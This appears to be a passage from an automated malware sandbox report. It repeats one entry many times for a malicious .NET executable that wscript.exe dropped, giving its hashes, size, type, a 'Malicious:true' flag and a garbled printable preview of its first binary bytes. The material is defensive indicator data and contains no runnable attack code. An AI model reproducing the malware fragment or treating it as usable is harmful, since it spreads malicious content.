                          Entropy (8bit):6.8939502624236235
                          Encrypted:false
                          SSDEEP:384:rknCoWESfT1upFgb1XYA1uokwqwADNeODVS/GbLjHulxcu9gbUW91i:0psYAJgtHulWWA
                          MD5:7999F942FF7190CB7C9F0E04D6DC3D41
                          SHA1:66C3743D7A3D0885A624600ABD71486C63A52904
                          SHA-256:8C52BA6DF441FEA41E87285A7A79E790773407B4D377730B4F834B067D355776
                          SHA-512:9EA2F9E0E81B69895023DA6A5E6F4850BDFB0E37D847A6086AFAA3DEBB928673276FA149B2E8DF154F6B0498191E5E7AB29C22BC415A761038435ABCC4607CEE
                          Malicious:true
                          Reputation:unknown
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6.Y.........."...0..J..........Vh... ........@.. ....................................`..................................h..O...................................`g............................................... ............... ..H............text...\H... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B................8h......H.......|%..l............8..x............................................0..T.........}.....(.......(...... .....(.......{....o....o.......{....o....(......{....o.....*..*".(.....*.0..+.........,..{.......+....,...{....o........(.....*..0............s....}.........(....s......s ...}.....s ...}.....s!...}.....s!...}......{....s"...}.....{....o#.....{....o#.....($.....{......s%...o&.....{....r...po'.....{.... J... ....s(...o).....{.....o*.....{.....o+.....{.....r...po,...t,...o
                          Process:C:\Windows\System32\wscript.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):21504
                          Entropy (8bit):6.8939502624236235
                          Encrypted:false
                          SSDEEP:384:rknCoWESfT1upFgb1XYA1uokwqwADNeODVS/GbLjHulxcu9gbUW91i:0psYAJgtHulWWA
                          MD5:7999F942FF7190CB7C9F0E04D6DC3D41
                          SHA1:66C3743D7A3D0885A624600ABD71486C63A52904
                          SHA-256:8C52BA6DF441FEA41E87285A7A79E790773407B4D377730B4F834B067D355776
                          SHA-512:9EA2F9E0E81B69895023DA6A5E6F4850BDFB0E37D847A6086AFAA3DEBB928673276FA149B2E8DF154F6B0498191E5E7AB29C22BC415A761038435ABCC4607CEE
                          Malicious:true
                          Reputation:unknown
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6.Y.........."...0..J..........Vh... ........@.. ....................................`..................................h..O...................................`g............................................... ............... ..H............text...\H... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B................8h......H.......|%..l............8..x............................................0..T.........}.....(.......(...... .....(.......{....o....o.......{....o....(......{....o.....*..*".(.....*.0..+.........,..{.......+....,...{....o........(.....*..0............s....}.........(....s......s ...}.....s ...}.....s!...}.....s!...}......{....s"...}.....{....o#.....{....o#.....($.....{......s%...o&.....{....r...po'.....{.... J... ....s(...o).....{.....o*.....{.....o+.....{.....r...po,...t,...o
                          Process:C:\Windows\System32\wscript.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):21504
                          Entropy (8bit):6.8939502624236235
                          Encrypted:false
                          SSDEEP:384:rknCoWESfT1upFgb1XYA1uokwqwADNeODVS/GbLjHulxcu9gbUW91i:0psYAJgtHulWWA
                          MD5:7999F942FF7190CB7C9F0E04D6DC3D41
                          SHA1:66C3743D7A3D0885A624600ABD71486C63A52904
                          SHA-256:8C52BA6DF441FEA41E87285A7A79E790773407B4D377730B4F834B067D355776
                          SHA-512:9EA2F9E0E81B69895023DA6A5E6F4850BDFB0E37D847A6086AFAA3DEBB928673276FA149B2E8DF154F6B0498191E5E7AB29C22BC415A761038435ABCC4607CEE
                          Malicious:true
                          Reputation:unknown
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6.Y.........."...0..J..........Vh... ........@.. ....................................`..................................h..O...................................`g............................................... ............... ..H............text...\H... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B................8h......H.......|%..l............8..x............................................0..T.........}.....(.......(...... .....(.......{....o....o.......{....o....(......{....o.....*..*".(.....*.0..+.........,..{.......+....,...{....o........(.....*..0............s....}.........(....s......s ...}.....s ...}.....s!...}.....s!...}......{....s"...}.....{....o#.....{....o#.....($.....{......s%...o&.....{....r...po'.....{.... J... ....s(...o).....{.....o*.....{.....o+.....{.....r...po,...t,...o
                          Process:C:\Windows\System32\wscript.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):21504
                          Entropy (8bit):6.8939502624236235
                          Encrypted:false
                          SSDEEP:384:rknCoWESfT1upFgb1XYA1uokwqwADNeODVS/GbLjHulxcu9gbUW91i:0psYAJgtHulWWA
                          MD5:7999F942FF7190CB7C9F0E04D6DC3D41
                          SHA1:66C3743D7A3D0885A624600ABD71486C63A52904
                          SHA-256:8C52BA6DF441FEA41E87285A7A79E790773407B4D377730B4F834B067D355776
                          SHA-512:9EA2F9E0E81B69895023DA6A5E6F4850BDFB0E37D847A6086AFAA3DEBB928673276FA149B2E8DF154F6B0498191E5E7AB29C22BC415A761038435ABCC4607CEE
                          Malicious:true
                          Reputation:unknown
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6.Y.........."...0..J..........Vh... ........@.. ....................................`..................................h..O...................................`g............................................... ............... ..H............text...\H... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B................8h......H.......|%..l............8..x............................................0..T.........}.....(.......(...... .....(.......{....o....o.......{....o....(......{....o.....*..*".(.....*.0..+.........,..{.......+....,...{....o........(.....*..0............s....}.........(....s......s ...}.....s ...}.....s!...}.....s!...}......{....s"...}.....{....o#.....{....o#.....($.....{......s%...o&.....{....r...po'.....{.... J... ....s(...o).....{.....o*.....{.....o+.....{.....r...po,...t,...o
                          Process:C:\Windows\System32\wscript.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):21504
                          Entropy (8bit):6.8939502624236235
                          Encrypted:false
                          SSDEEP:384:rknCoWESfT1upFgb1XYA1uokwqwADNeODVS/GbLjHulxcu9gbUW91i:0psYAJgtHulWWA
                          MD5:7999F942FF7190CB7C9F0E04D6DC3D41
                          SHA1:66C3743D7A3D0885A624600ABD71486C63A52904
                          SHA-256:8C52BA6DF441FEA41E87285A7A79E790773407B4D377730B4F834B067D355776
                          SHA-512:9EA2F9E0E81B69895023DA6A5E6F4850BDFB0E37D847A6086AFAA3DEBB928673276FA149B2E8DF154F6B0498191E5E7AB29C22BC415A761038435ABCC4607CEE
                          Malicious:true
                          Reputation:unknown
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6.Y.........."...0..J..........Vh... ........@.. ....................................`..................................h..O...................................`g............................................... ............... ..H............text...\H... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B................8h......H.......|%..l............8..x............................................0..T.........}.....(.......(...... .....(.......{....o....o.......{....o....(......{....o.....*..*".(.....*.0..+.........,..{.......+....,...{....o........(.....*..0............s....}.........(....s......s ...}.....s ...}.....s!...}.....s!...}......{....s"...}.....{....o#.....{....o#.....($.....{......s%...o&.....{....r...po'.....{.... J... ....s(...o).....{.....o*.....{.....o+.....{.....r...po,...t,...o
                          Process:C:\Windows\System32\wscript.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):21504
                          Entropy (8bit):6.8939502624236235
                          Encrypted:false
                          SSDEEP:384:rknCoWESfT1upFgb1XYA1uokwqwADNeODVS/GbLjHulxcu9gbUW91i:0psYAJgtHulWWA
                          MD5:7999F942FF7190CB7C9F0E04D6DC3D41
                          SHA1:66C3743D7A3D0885A624600ABD71486C63A52904
                          SHA-256:8C52BA6DF441FEA41E87285A7A79E790773407B4D377730B4F834B067D355776
                          SHA-512:9EA2F9E0E81B69895023DA6A5E6F4850BDFB0E37D847A6086AFAA3DEBB928673276FA149B2E8DF154F6B0498191E5E7AB29C22BC415A761038435ABCC4607CEE
                          Malicious:true
                          Reputation:unknown
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6.Y.........."...0..J..........Vh... ........@.. ....................................`..................................h..O...................................`g............................................... ............... ..H............text...\H... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B................8h......H.......|%..l............8..x............................................0..T.........}.....(.......(...... .....(.......{....o....o.......{....o....(......{....o.....*..*".(.....*.0..+.........,..{.......+....,...{....o........(.....*..0............s....}.........(....s......s ...}.....s ...}.....s!...}.....s!...}......{....s"...}.....{....o#.....{....o#.....($.....{......s%...o&.....{....r...po'.....{.... J... ....s(...o).....{.....o*.....{.....o+.....{.....r...po,...t,...o
                          Process:C:\Windows\System32\wscript.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):21504
                          Entropy (8bit):6.8939502624236235
                          Encrypted:false
                          SSDEEP:384:rknCoWESfT1upFgb1XYA1uokwqwADNeODVS/GbLjHulxcu9gbUW91i:0psYAJgtHulWWA
                          MD5:7999F942FF7190CB7C9F0E04D6DC3D41
                          SHA1:66C3743D7A3D0885A624600ABD71486C63A52904
                          SHA-256:8C52BA6DF441FEA41E87285A7A79E790773407B4D377730B4F834B067D355776
                          SHA-512:9EA2F9E0E81B69895023DA6A5E6F4850BDFB0E37D847A6086AFAA3DEBB928673276FA149B2E8DF154F6B0498191E5E7AB29C22BC415A761038435ABCC4607CEE
                          Malicious:true
                          Reputation:unknown
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6.Y.........."...0..J..........Vh... ........@.. ....................................`..................................h..O...................................`g............................................... ............... ..H............text...\H... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B................8h......H.......|%..l............8..x............................................0..T.........}.....(.......(...... .....(.......{....o....o.......{....o....(......{....o.....*..*".(.....*.0..+.........,..{.......+....,...{....o........(.....*..0............s....}.........(....s......s ...}.....s ...}.....s!...}.....s!...}......{....s"...}.....{....o#.....{....o#.....($.....{......s%...o&.....{....r...po'.....{.... J... ....s(...o).....{.....o*.....{.....o+.....{.....r...po,...t,...o
                          Process:C:\Windows\System32\wscript.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):21504
                          Entropy (8bit):6.8939502624236235
                          Encrypted:false
                          SSDEEP:384:rknCoWESfT1upFgb1XYA1uokwqwADNeODVS/GbLjHulxcu9gbUW91i:0psYAJgtHulWWA
                          MD5:7999F942FF7190CB7C9F0E04D6DC3D41
                          SHA1:66C3743D7A3D0885A624600ABD71486C63A52904
                          SHA-256:8C52BA6DF441FEA41E87285A7A79E790773407B4D377730B4F834B067D355776
                          SHA-512:9EA2F9E0E81B69895023DA6A5E6F4850BDFB0E37D847A6086AFAA3DEBB928673276FA149B2E8DF154F6B0498191E5E7AB29C22BC415A761038435ABCC4607CEE
                          Malicious:true
                          Reputation:unknown
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6.Y.........."...0..J..........Vh... ........@.. ....................................`..................................h..O...................................`g............................................... ............... ..H............text...\H... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B................8h......H.......|%..l............8..x............................................0..T.........}.....(.......(...... .....(.......{....o....o.......{....o....(......{....o.....*..*".(.....*.0..+.........,..{.......+....,...{....o........(.....*..0............s....}.........(....s......s ...}.....s ...}.....s!...}.....s!...}......{....s"...}.....{....o#.....{....o#.....($.....{......s%...o&.....{....r...po'.....{.... J... ....s(...o).....{.....o*.....{.....o+.....{.....r...po,...t,...o
                          Process:C:\Windows\System32\wscript.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):21504
                          Entropy (8bit):6.8939502624236235
                          Encrypted:false
                          SSDEEP:384:rknCoWESfT1upFgb1XYA1uokwqwADNeODVS/GbLjHulxcu9gbUW91i:0psYAJgtHulWWA
                          MD5:7999F942FF7190CB7C9F0E04D6DC3D41
                          SHA1:66C3743D7A3D0885A624600ABD71486C63A52904
                          SHA-256:8C52BA6DF441FEA41E87285A7A79E790773407B4D377730B4F834B067D355776
                          SHA-512:9EA2F9E0E81B69895023DA6A5E6F4850BDFB0E37D847A6086AFAA3DEBB928673276FA149B2E8DF154F6B0498191E5E7AB29C22BC415A761038435ABCC4607CEE
                          Malicious:true
                          Reputation:unknown
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6.Y.........."...0..J..........Vh... ........@.. ....................................`..................................h..O...................................`g............................................... ............... ..H............text...\H... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B................8h......H.......|%..l............8..x............................................0..T.........}.....(.......(...... .....(.......{....o....o.......{....o....(......{....o.....*..*".(.....*.0..+.........,..{.......+....,...{....o........(.....*..0............s....}.........(....s......s ...}.....s ...}.....s!...}.....s!...}......{....s"...}.....{....o#.....{....o#.....($.....{......s%...o&.....{....r...po'.....{.... J... ....s(...o).....{.....o*.....{.....o+.....{.....r...po,...t,...o
                          Process:C:\Windows\System32\wscript.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):21504
                          Entropy (8bit):6.8939502624236235
                          Encrypted:false
                          SSDEEP:384:rknCoWESfT1upFgb1XYA1uokwqwADNeODVS/GbLjHulxcu9gbUW91i:0psYAJgtHulWWA
                          MD5:7999F942FF7190CB7C9F0E04D6DC3D41
                          SHA1:66C3743D7A3D0885A624600ABD71486C63A52904
                          SHA-256:8C52BA6DF441FEA41E87285A7A79E790773407B4D377730B4F834B067D355776
                          SHA-512:9EA2F9E0E81B69895023DA6A5E6F4850BDFB0E37D847A6086AFAA3DEBB928673276FA149B2E8DF154F6B0498191E5E7AB29C22BC415A761038435ABCC4607CEE
                          Malicious:true
                          Reputation:unknown
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6.Y.........."...0..J..........Vh... ........@.. ....................................`..................................h..O...................................`g............................................... ............... ..H............text...\H... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B................8h......H.......|%..l............8..x............................................0..T.........}.....(.......(...... .....(.......{....o....o.......{....o....(......{....o.....*..*".(.....*.0..+.........,..{.......+....,...{....o........(.....*..0............s....}.........(....s......s ...}.....s ...}.....s!...}.....s!...}......{....s"...}.....{....o#.....{....o#.....($.....{......s%...o&.....{....r...po'.....{.... J... ....s(...o).....{.....o*.....{.....o+.....{.....r...po,...t,...o
                          Process:C:\Windows\System32\wscript.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):21504
                          Entropy (8bit):6.8939502624236235
                          Encrypted:false
                          SSDEEP:384:rknCoWESfT1upFgb1XYA1uokwqwADNeODVS/GbLjHulxcu9gbUW91i:0psYAJgtHulWWA
                          MD5:7999F942FF7190CB7C9F0E04D6DC3D41
                          SHA1:66C3743D7A3D0885A624600ABD71486C63A52904
                          SHA-256:8C52BA6DF441FEA41E87285A7A79E790773407B4D377730B4F834B067D355776
                          SHA-512:9EA2F9E0E81B69895023DA6A5E6F4850BDFB0E37D847A6086AFAA3DEBB928673276FA149B2E8DF154F6B0498191E5E7AB29C22BC415A761038435ABCC4607CEE
                          Malicious:true
                          Reputation:unknown
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6.Y.........."...0..J..........Vh... ........@.. ....................................`..................................h..O...................................`g............................................... ............... ..H............text...\H... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B................8h......H.......|%..l............8..x............................................0..T.........}.....(.......(...... .....(.......{....o....o.......{....o....(......{....o.....*..*".(.....*.0..+.........,..{.......+....,...{....o........(.....*..0............s....}.........(....s......s ...}.....s ...}.....s!...}.....s!...}......{....s"...}.....{....o#.....{....o#.....($.....{......s%...o&.....{....r...po'.....{.... J... ....s(...o).....{.....o*.....{.....o+.....{.....r...po,...t,...o
                          Process:C:\Windows\System32\wscript.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):21504
                          Entropy (8bit):6.8939502624236235
                          Encrypted:false
                          SSDEEP:384:rknCoWESfT1upFgb1XYA1uokwqwADNeODVS/GbLjHulxcu9gbUW91i:0psYAJgtHulWWA
                          MD5:7999F942FF7190CB7C9F0E04D6DC3D41
                          SHA1:66C3743D7A3D0885A624600ABD71486C63A52904
                          SHA-256:8C52BA6DF441FEA41E87285A7A79E790773407B4D377730B4F834B067D355776
                          SHA-512:9EA2F9E0E81B69895023DA6A5E6F4850BDFB0E37D847A6086AFAA3DEBB928673276FA149B2E8DF154F6B0498191E5E7AB29C22BC415A761038435ABCC4607CEE
                          Malicious:true
                          Reputation:unknown
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6.Y.........."...0..J..........Vh... ........@.. ....................................`..................................h..O...................................`g............................................... ............... ..H............text...\H... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B................8h......H.......|%..l............8..x............................................0..T.........}.....(.......(...... .....(.......{....o....o.......{....o....(......{....o.....*..*".(.....*.0..+.........,..{.......+....,...{....o........(.....*..0............s....}.........(....s......s ...}.....s ...}.....s!...}.....s!...}......{....s"...}.....{....o#.....{....o#.....($.....{......s%...o&.....{....r...po'.....{.... J... ....s(...o).....{.....o*.....{.....o+.....{.....r...po,...t,...o
                          Process:C:\Windows\System32\wscript.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):21504
                          Entropy (8bit):6.8939502624236235
                          Encrypted:false
                          SSDEEP:384:rknCoWESfT1upFgb1XYA1uokwqwADNeODVS/GbLjHulxcu9gbUW91i:0psYAJgtHulWWA
                          MD5:7999F942FF7190CB7C9F0E04D6DC3D41
                          SHA1:66C3743D7A3D0885A624600ABD71486C63A52904
                          SHA-256:8C52BA6DF441FEA41E87285A7A79E790773407B4D377730B4F834B067D355776
                          SHA-512:9EA2F9E0E81B69895023DA6A5E6F4850BDFB0E37D847A6086AFAA3DEBB928673276FA149B2E8DF154F6B0498191E5E7AB29C22BC415A761038435ABCC4607CEE
                          Malicious:true
                          Reputation:unknown
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6.Y.........."...0..J..........Vh... ........@.. ....................................`..................................h..O...................................`g............................................... ............... ..H............text...\H... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B................8h......H.......|%..l............8..x............................................0..T.........}.....(.......(...... .....(.......{....o....o.......{....o....(......{....o.....*..*".(.....*.0..+.........,..{.......+....,...{....o........(.....*..0............s....}.........(....s......s ...}.....s ...}.....s!...}.....s!...}......{....s"...}.....{....o#.....{....o#.....($.....{......s%...o&.....{....r...po'.....{.... J... ....s(...o).....{.....o*.....{.....o+.....{.....r...po,...t,...o
                          Process:C:\Windows\System32\wscript.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):21504
                          Entropy (8bit):6.8939502624236235
                          Encrypted:false
                          SSDEEP:384:rknCoWESfT1upFgb1XYA1uokwqwADNeODVS/GbLjHulxcu9gbUW91i:0psYAJgtHulWWA
                          MD5:7999F942FF7190CB7C9F0E04D6DC3D41
                          SHA1:66C3743D7A3D0885A624600ABD71486C63A52904
                          SHA-256:8C52BA6DF441FEA41E87285A7A79E790773407B4D377730B4F834B067D355776
                          SHA-512:9EA2F9E0E81B69895023DA6A5E6F4850BDFB0E37D847A6086AFAA3DEBB928673276FA149B2E8DF154F6B0498191E5E7AB29C22BC415A761038435ABCC4607CEE
                          Malicious:true
                          Reputation:unknown
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6.Y.........."...0..J..........Vh... ........@.. ....................................`..................................h..O...................................`g............................................... ............... ..H............text...\H... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B................8h......H.......|%..l............8..x............................................0..T.........}.....(.......(...... .....(.......{....o....o.......{....o....(......{....o.....*..*".(.....*.0..+.........,..{.......+....,...{....o........(.....*..0............s....}.........(....s......s ...}.....s ...}.....s!...}.....s!...}......{....s"...}.....{....o#.....{....o#.....($.....{......s%...o&.....{....r...po'.....{.... J... ....s(...o).....{.....o*.....{.....o+.....{.....r...po,...t,...o
                          Process:C:\Windows\System32\wscript.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):21504
                          Entropy (8bit):6.8939502624236235
                          Encrypted:false
                          SSDEEP:384:rknCoWESfT1upFgb1XYA1uokwqwADNeODVS/GbLjHulxcu9gbUW91i:0psYAJgtHulWWA
                          MD5:7999F942FF7190CB7C9F0E04D6DC3D41
                          SHA1:66C3743D7A3D0885A624600ABD71486C63A52904
                          SHA-256:8C52BA6DF441FEA41E87285A7A79E790773407B4D377730B4F834B067D355776
                          SHA-512:9EA2F9E0E81B69895023DA6A5E6F4850BDFB0E37D847A6086AFAA3DEBB928673276FA149B2E8DF154F6B0498191E5E7AB29C22BC415A761038435ABCC4607CEE
                          Malicious:true
                          Reputation:unknown
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6.Y.........."...0..J..........Vh... ........@.. ....................................`..................................h..O...................................`g............................................... ............... ..H............text...\H... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B................8h......H.......|%..l............8..x............................................0..T.........}.....(.......(...... .....(.......{....o....o.......{....o....(......{....o.....*..*".(.....*.0..+.........,..{.......+....,...{....o........(.....*..0............s....}.........(....s......s ...}.....s ...}.....s!...}.....s!...}......{....s"...}.....{....o#.....{....o#.....($.....{......s%...o&.....{....r...po'.....{.... J... ....s(...o).....{.....o*.....{.....o+.....{.....r...po,...t,...o
                          Process:C:\Windows\System32\wscript.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):21504
                          Entropy (8bit):6.8939502624236235
                          Encrypted:false
                          SSDEEP:384:rknCoWESfT1upFgb1XYA1uokwqwADNeODVS/GbLjHulxcu9gbUW91i:0psYAJgtHulWWA
                          MD5:7999F942FF7190CB7C9F0E04D6DC3D41
                          SHA1:66C3743D7A3D0885A624600ABD71486C63A52904
                          SHA-256:8C52BA6DF441FEA41E87285A7A79E790773407B4D377730B4F834B067D355776
                          SHA-512:9EA2F9E0E81B69895023DA6A5E6F4850BDFB0E37D847A6086AFAA3DEBB928673276FA149B2E8DF154F6B0498191E5E7AB29C22BC415A761038435ABCC4607CEE
                          Malicious:true
                          Reputation:unknown
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6.Y.........."...0..J..........Vh... ........@.. ....................................`..................................h..O...................................`g............................................... ............... ..H............text...\H... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B................8h......H.......|%..l............8..x............................................0..T.........}.....(.......(...... .....(.......{....o....o.......{....o....(......{....o.....*..*".(.....*.0..+.........,..{.......+....,...{....o........(.....*..0............s....}.........(....s......s ...}.....s ...}.....s!...}.....s!...}......{....s"...}.....{....o#.....{....o#.....($.....{......s%...o&.....{....r...po'.....{.... J... ....s(...o).....{.....o*.....{.....o+.....{.....r...po,...t,...o
                          Process:C:\Windows\System32\wscript.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):21504
                          Entropy (8bit):6.8939502624236235
                          Encrypted:false
                          SSDEEP:384:rknCoWESfT1upFgb1XYA1uokwqwADNeODVS/GbLjHulxcu9gbUW91i:0psYAJgtHulWWA
                          MD5:7999F942FF7190CB7C9F0E04D6DC3D41
                          SHA1:66C3743D7A3D0885A624600ABD71486C63A52904
                          SHA-256:8C52BA6DF441FEA41E87285A7A79E790773407B4D377730B4F834B067D355776
                          SHA-512:9EA2F9E0E81B69895023DA6A5E6F4850BDFB0E37D847A6086AFAA3DEBB928673276FA149B2E8DF154F6B0498191E5E7AB29C22BC415A761038435ABCC4607CEE
                          Malicious:true
                          Reputation:unknown
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6.Y.........."...0..J..........Vh... ........@.. ....................................`..................................h..O...................................`g............................................... ............... ..H............text...\H... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B................8h......H.......|%..l............8..x............................................0..T.........}.....(.......(...... .....(.......{....o....o.......{....o....(......{....o.....*..*".(.....*.0..+.........,..{.......+....,...{....o........(.....*..0............s....}.........(....s......s ...}.....s ...}.....s!...}.....s!...}......{....s"...}.....{....o#.....{....o#.....($.....{......s%...o&.....{....r...po'.....{.... J... ....s(...o).....{.....o*.....{.....o+.....{.....r...po,...t,...o
                          Process:C:\Windows\System32\wscript.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):21504
                          Entropy (8bit):6.8939502624236235
                          Encrypted:false
                          SSDEEP:384:rknCoWESfT1upFgb1XYA1uokwqwADNeODVS/GbLjHulxcu9gbUW91i:0psYAJgtHulWWA
                          MD5:7999F942FF7190CB7C9F0E04D6DC3D41
                          SHA1:66C3743D7A3D0885A624600ABD71486C63A52904
                          SHA-256:8C52BA6DF441FEA41E87285A7A79E790773407B4D377730B4F834B067D355776
                          SHA-512:9EA2F9E0E81B69895023DA6A5E6F4850BDFB0E37D847A6086AFAA3DEBB928673276FA149B2E8DF154F6B0498191E5E7AB29C22BC415A761038435ABCC4607CEE
                          Malicious:true
                          Reputation:unknown
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6.Y.........."...0..J..........Vh... ........@.. ....................................`..................................h..O...................................`g............................................... ............... ..H............text...\H... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B................8h......H.......|%..l............8..x............................................0..T.........}.....(.......(...... .....(.......{....o....o.......{....o....(......{....o.....*..*".(.....*.0..+.........,..{.......+....,...{....o........(.....*..0............s....}.........(....s......s ...}.....s ...}.....s!...}.....s!...}......{....s"...}.....{....o#.....{....o#.....($.....{......s%...o&.....{....r...po'.....{.... J... ....s(...o).....{.....o*.....{.....o+.....{.....r...po,...t,...o
                          Process:C:\Windows\System32\wscript.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):21504
                          Entropy (8bit):6.8939502624236235
                          Encrypted:false
                          SSDEEP:384:rknCoWESfT1upFgb1XYA1uokwqwADNeODVS/GbLjHulxcu9gbUW91i:0psYAJgtHulWWA
                          MD5:7999F942FF7190CB7C9F0E04D6DC3D41
                          SHA1:66C3743D7A3D0885A624600ABD71486C63A52904
                          SHA-256:8C52BA6DF441FEA41E87285A7A79E790773407B4D377730B4F834B067D355776
                          SHA-512:9EA2F9E0E81B69895023DA6A5E6F4850BDFB0E37D847A6086AFAA3DEBB928673276FA149B2E8DF154F6B0498191E5E7AB29C22BC415A761038435ABCC4607CEE
                          Malicious:true
                          Reputation:unknown
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6.Y.........."...0..J..........Vh... ........@.. ....................................`..................................h..O...................................`g............................................... ............... ..H............text...\H... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B................8h......H.......|%..l............8..x............................................0..T.........}.....(.......(...... .....(.......{....o....o.......{....o....(......{....o.....*..*".(.....*.0..+.........,..{.......+....,...{....o........(.....*..0............s....}.........(....s......s ...}.....s ...}.....s!...}.....s!...}......{....s"...}.....{....o#.....{....o#.....($.....{......s%...o&.....{....r...po'.....{.... J... ....s(...o).....{.....o*.....{.....o+.....{.....r...po,...t,...o
                          Process:C:\Windows\System32\wscript.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):21504
                          Entropy (8bit):6.8939502624236235
                          Encrypted:false
                          SSDEEP:384:rknCoWESfT1upFgb1XYA1uokwqwADNeODVS/GbLjHulxcu9gbUW91i:0psYAJgtHulWWA
                          MD5:7999F942FF7190CB7C9F0E04D6DC3D41
                          SHA1:66C3743D7A3D0885A624600ABD71486C63A52904
                          SHA-256:8C52BA6DF441FEA41E87285A7A79E790773407B4D377730B4F834B067D355776
                          SHA-512:9EA2F9E0E81B69895023DA6A5E6F4850BDFB0E37D847A6086AFAA3DEBB928673276FA149B2E8DF154F6B0498191E5E7AB29C22BC415A761038435ABCC4607CEE
                          Malicious:true
                          Reputation:unknown
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6.Y.........."...0..J..........Vh... ........@.. ....................................`..................................h..O...................................`g............................................... ............... ..H............text...\H... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B................8h......H.......|%..l............8..x............................................0..T.........}.....(.......(...... .....(.......{....o....o.......{....o....(......{....o.....*..*".(.....*.0..+.........,..{.......+....,...{....o........(.....*..0............s....}.........(....s......s ...}.....s ...}.....s!...}.....s!...}......{....s"...}.....{....o#.....{....o#.....($.....{......s%...o&.....{....r...po'.....{.... J... ....s(...o).....{.....o*.....{.....o+.....{.....r...po,...t,...o
                          Process:C:\Windows\System32\wscript.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):21504
                          Entropy (8bit):6.8939502624236235
                          Encrypted:false
